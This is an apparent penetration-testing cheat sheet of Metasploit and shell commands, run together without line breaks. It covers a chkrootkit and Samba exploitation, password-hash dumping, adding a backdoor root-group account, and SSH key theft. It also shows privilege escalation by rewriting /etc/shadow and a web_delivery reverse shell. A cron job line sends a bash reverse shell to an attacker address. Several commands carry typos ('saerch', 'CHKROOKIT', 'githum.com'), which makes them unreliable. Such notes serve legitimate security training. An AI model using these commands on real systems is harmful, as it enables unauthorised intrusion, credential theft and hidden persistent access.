PASSWORD password > exploit > sessions 1 > pwd > whoami > background > sessions -u 1 > sessions 2 > sysinfo > getuid > bash > ps aux > cat /bin/check-down > chkrootkit --help > chkrootkit -V > background > saerch chkrootkit > show options > set CHKROOKIT /bin/chkrootkit > set SESSION <mp-id> > set LHOST eth1 > exploit > /bin/bash -i Dumping Hashes with Hashdump > setg RHOSTS <IP> > use exploit/linux/samba/is_known_pipename > exploit > sessions -u 1 > sessions 2 > sysinfo > getuid > background > search hashdump > use post/linux/gather/hashdump > show options > set SESSION <id> > run > loot > sessions 3 > /bin/bash -i Establishing Persistence on Linux > use auxiliary/scanner/ssh/ssh_login > set USERNAME jackie > set PASSWORD password > exploit > sessions > sessions -u 1 > sessions 2 > search chkrootkit > set SESSION <id> > set CHKROOTKIT /bin/chkrootkit > set LHOSTS eth1 > set LPORT <> > exploit > sessions -u 3 > sessions 4 > getuid > shell > /bin/bash -i > useradd -m ftp -s /bin/bash > passwd ftp // enter: password123 > cat /etc/passwd > groups root > usermod -aG root ftp > groups ftp > usermod -u 15 ftp > cat /etc/passwd > search platform:linux persistence > use exploit/linux/local/cron_persistence > set SESSION 4 > set LPORT 4422 > set LHOST eth1 > exploit // fail > use exploit/linux/local/service_persistence > set SESSION 4 > set payload cmd/unix/reverse_python > set LPORT 4422 > exploit // fail > set target 4 > exploit // fail > use exploit/linux/local/sshkey_persistence > set CREATESSHFOLDER true > set SESSION 4 > exploit > loot > cat private_key.txt // use from loot > nano ssh_key // paste the key > chmod 0400 ssh_key > ssh -i ssh_key root@<target-ip> > Exploitation Banner Grabbing > nmap -sV -O <IP> > ls -la /usr/share/nmap/scripts | grep banner > nmap -sV --script=banner <IP> > nc <IP> <Port> Nmap Vulnerability Scanning > nmap -sV -O <IP> > ls -la /usr/share/nmap/scripts/ | grep http > nmap -sV --script=http-enum <IP> Post Exploitation Methodology Local Enumeration Transferring Files Upgrading Shells Privilege Escalation Persistence Dumping & Cracking Hashes Pivoting Clearing Tracks Windows Enum Users & Groups > use post/windows/gather/enum_logged_on_users > set SESSION 1 > run > shell > net user administrator > whoami /priv > route print > netstat -ano > netsh firewall show state > tasklist /SVC // Enumerate the list of running processes > show_mount > use post/windows/gather/win_privs > set SESSION 1 > run > use post/windows/gather/enum_applications > use post/windows/gather/enum_computers > use post/windows/gather/enum_patches Linux Enum > useradd bob -s /bin/bash > githum.com/rebootuser/LinEnum Windows Priv Escalation > PrivescCheck > search web_delivery > use exploit/multi/script/web_delivery > set TARGET PSH\ (Binary) > set payload windows/shell/reverse_tcp > set PSH-EncodedCommand false > set LHOST eth1 > exploit > copy & paste in windows cmd > whoami > background > use shell_to_meterpreter > set LHOST eth1 > set WIN_TRANSFER VBS > exploit Linux Priv Escalation // Exploiting Permissions > whoami > cat /etc/passwd > find / -not -type l -perm -o+w > cat /etc/shadow > openssl passwd -1 -salt abc password > nano /etc/shadow // Remove * & paste the hash > su // Exploiting SUDO Privs > cat /etc/passwd > sudo -l > sudo man cat > !/bin/bash Linux Persistence // Via SSH Keys > ssh student@<IP> // password:password > ls -la > cat wait > cd .ssh > cat id_rsa > cat authorized_key > scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally > chmod 400 id_rsa > ssh student@<IP> // password:password > rm wait > ssh -i id_rsa student@<IP> // Via Cron Jobs > ssh student@<IP> // password:password > cat /etc/cron* > echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron > cat cron > crontab -i cron > crontab -l > rm wait > nc -nvlp 1234 >